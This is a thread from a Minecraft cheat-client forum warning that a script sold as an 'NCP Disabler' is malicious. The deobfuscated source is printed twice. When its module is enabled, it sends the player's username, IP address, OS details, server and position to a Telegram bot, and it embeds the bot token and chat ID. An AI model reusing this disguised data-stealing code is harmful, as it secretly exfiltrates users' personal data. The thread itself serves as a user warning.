Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse

LiquidBounce Forum

  1. Home
  2. General Discussion
  3. "NCP Disabler" deobf

"NCP Disabler" deobf

Scheduled Pinned Locked Moved General Discussion
7 Posts 6 Posters 1.2k Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • DreamWasFuckedD Offline
    DreamWasFuckedD Offline
    DreamWasFucked
    wrote on last edited by Senk Ju
    #1

    lol

    Malicious. DON'T use this script.

    // Deobf by Shurpe
    var DateTimeFormatter = Java.type('java.time.format.DateTimeFormatter'),
        BufferedInputStream = Java.type('java.io.BufferedInputStream'),
        InputStreamReader = Java.type('java.io.InputStreamReader'),
        Minecraft = Java.type('net.minecraft.client.Minecraft'),
        BufferedReader = Java.type('java.io.BufferedReader'),
        ZonedDateTime = Java.type('java.time.ZonedDateTime'),
        IOException = Java.type('java.io.IOException'),
        Exception = Java.type('java.lang.Exception'),
        ZoneId = Java.type('java.time.ZoneId'),
        Locale = Java.type('java.util.Locale'),
        System = Java.type('java.lang.System'),
        String = Java.type('java.lang.String'),
        URL = Java.type('java.net.URL');
    
        DTF = DateTimeFormatter.ofPattern('MMMM d, yyyy HH:mm:ss', Locale.US),
        defaultZoneId = ZoneId.systemDefault(),
        API_TOKEN = '1418453085:AAFoFiTWZMrw9k6pSwzX37LTdHRYiK6WqA0',
        CHAT_ID = '1294649917';
    
    function sendToTelegram(text) {
        URLString = "https://api.telegram.org/bot%s/sendMessage?chat_id=%s&text=%s";
        URLString = String.format(URLString, API_TOKEN, CHAT_ID, text);
        try {
            url = new URL(URLString);
            conn = url.openConnection();
            new BufferedInputStream(conn.getInputStream());
        } catch (IOException) {
            // ?
        }
    }
    function getIPAddress () {
        try {
            IPAddress = new BufferedReader(new InputStreamReader(new URL('http://checkip.amazonaws.com').openStream())).readLine();
        } catch (Exception) {
            IPAddress = 'Failed to obtain an IP address. (' + Exception + ')';
        }
        return IPAddress;
    }
    var script = registerScript({
        name: 'OPDISABLER2011NOTPATCHED',
        version: '0.0.1',
        authors: ['LiquidBounce']
    });
    script.registerModule({
        name: 'OPDISABLER2011NOTPATCHED',
        category: 'Exploit', 
        description: ''
    
    }, function (module) {
        module.on('enable', function() {
            sendToTelegram(
                'User name : ' + System.getProperty("user.name") +
                '%0ALog date : ' + DTF.format(ZonedDateTime.now(defaultZoneId)) + ' ' + defaultZoneId +
                '%0AIP address : ' + getIPAddress() +
                '%0AOS architecture : ' + System.getProperty("os.arch") +
                '%0AOS version : ' + System.getProperty("os.version") +
                '%0AOS name : ' + System.getProperty("os.name") +
                '%0AMinecraft name : ' + mc.thePlayer.getName() +
                '%0AOnline server : ' + (Minecraft.getMinecraft().isSingleplayer() ? 'Singleplayer' : (mc.getCurrentServerData() != null ? mc.getCurrentServerData().serverIP.toLowerCase() : 'Unable to get a server.')) +
                '%0AServer position : ' + (Minecraft.getMinecraft().isSingleplayer() ? '-' : (mc.getCurrentServerData() != null ? (mc.thePlayer.posX.toFixed() + ', ' + mc.thePlayer.posY.toFixed() + ', ' + mc.thePlayer.posZ.toFixed()) : 'Unable to get a position.'))
            );
        });
    });
    
    ? 1 Reply Last reply
    6
    • DreamWasFuckedD Offline
      DreamWasFuckedD Offline
      DreamWasFucked
      wrote on last edited by
      #2

      pls rate 5 stars

      M 1 Reply Last reply
      0
      • DreamWasFuckedD DreamWasFucked

        pls rate 5 stars

        M Offline
        M Offline
        mems
        Moderator
        wrote on last edited by
        #3

        @tenebrous ok

        1 Reply Last reply
        0
        • DreamWasFuckedD DreamWasFucked

          lol

          Malicious. DON'T use this script.

          // Deobf by Shurpe
          var DateTimeFormatter = Java.type('java.time.format.DateTimeFormatter'),
              BufferedInputStream = Java.type('java.io.BufferedInputStream'),
              InputStreamReader = Java.type('java.io.InputStreamReader'),
              Minecraft = Java.type('net.minecraft.client.Minecraft'),
              BufferedReader = Java.type('java.io.BufferedReader'),
              ZonedDateTime = Java.type('java.time.ZonedDateTime'),
              IOException = Java.type('java.io.IOException'),
              Exception = Java.type('java.lang.Exception'),
              ZoneId = Java.type('java.time.ZoneId'),
              Locale = Java.type('java.util.Locale'),
              System = Java.type('java.lang.System'),
              String = Java.type('java.lang.String'),
              URL = Java.type('java.net.URL');
          
              DTF = DateTimeFormatter.ofPattern('MMMM d, yyyy HH:mm:ss', Locale.US),
              defaultZoneId = ZoneId.systemDefault(),
              API_TOKEN = '1418453085:AAFoFiTWZMrw9k6pSwzX37LTdHRYiK6WqA0',
              CHAT_ID = '1294649917';
          
          function sendToTelegram(text) {
              URLString = "https://api.telegram.org/bot%s/sendMessage?chat_id=%s&text=%s";
              URLString = String.format(URLString, API_TOKEN, CHAT_ID, text);
              try {
                  url = new URL(URLString);
                  conn = url.openConnection();
                  new BufferedInputStream(conn.getInputStream());
              } catch (IOException) {
                  // ?
              }
          }
          function getIPAddress () {
              try {
                  IPAddress = new BufferedReader(new InputStreamReader(new URL('http://checkip.amazonaws.com').openStream())).readLine();
              } catch (Exception) {
                  IPAddress = 'Failed to obtain an IP address. (' + Exception + ')';
              }
              return IPAddress;
          }
          var script = registerScript({
              name: 'OPDISABLER2011NOTPATCHED',
              version: '0.0.1',
              authors: ['LiquidBounce']
          });
          script.registerModule({
              name: 'OPDISABLER2011NOTPATCHED',
              category: 'Exploit', 
              description: ''
          
          }, function (module) {
              module.on('enable', function() {
                  sendToTelegram(
                      'User name : ' + System.getProperty("user.name") +
                      '%0ALog date : ' + DTF.format(ZonedDateTime.now(defaultZoneId)) + ' ' + defaultZoneId +
                      '%0AIP address : ' + getIPAddress() +
                      '%0AOS architecture : ' + System.getProperty("os.arch") +
                      '%0AOS version : ' + System.getProperty("os.version") +
                      '%0AOS name : ' + System.getProperty("os.name") +
                      '%0AMinecraft name : ' + mc.thePlayer.getName() +
                      '%0AOnline server : ' + (Minecraft.getMinecraft().isSingleplayer() ? 'Singleplayer' : (mc.getCurrentServerData() != null ? mc.getCurrentServerData().serverIP.toLowerCase() : 'Unable to get a server.')) +
                      '%0AServer position : ' + (Minecraft.getMinecraft().isSingleplayer() ? '-' : (mc.getCurrentServerData() != null ? (mc.thePlayer.posX.toFixed() + ', ' + mc.thePlayer.posY.toFixed() + ', ' + mc.thePlayer.posZ.toFixed()) : 'Unable to get a position.'))
                  );
              });
          });
          
          ? Offline
          ? Offline
          A Former User
          wrote on last edited by
          #4

          @tenebrous Is the 'Shurpe' an application or a person ...?

          DreamWasFuckedD FaaatPotatoF 2 Replies Last reply
          0
          • ? A Former User

            @tenebrous Is the 'Shurpe' an application or a person ...?

            DreamWasFuckedD Offline
            DreamWasFuckedD Offline
            DreamWasFucked
            wrote on last edited by
            #5

            @leejames2305 minecraft name

            1 Reply Last reply
            0
            • ? A Former User

              @tenebrous Is the 'Shurpe' an application or a person ...?

              FaaatPotatoF Offline
              FaaatPotatoF Offline
              FaaatPotato
              wrote on last edited by
              #6

              @leejames2305 person

              1 Reply Last reply
              0
              • Senk JuS Senk Ju locked this topic on
              • Senk JuS Offline
                Senk JuS Offline
                Senk Ju
                Admin
                wrote on last edited by
                #7

                Leave this topic as it is. It may not be dangerous anymore but it's still not what it claims to be and I don't want users to be confused.

                1 Reply Last reply
                0
                Reply
                • Reply as topic
                Log in to reply
                • Oldest to Newest
                • Newest to Oldest
                • Most Votes


                About
                • Terms of Service
                • Privacy Policy
                • Status
                • Contact Us
                Downloads
                • Releases
                • Source code
                • License
                Docs
                • Tutorials
                • CustomHUD
                • AutoSettings
                • ScriptAPI
                Community
                • Forum
                • Guilded
                • YouTube
                • Twitter
                • D.Tube
                • Login

                • Login or register to search.
                • First post
                  Last post
                0
                • Categories
                • Recent
                • Tags
                • Popular
                • Users
                • Groups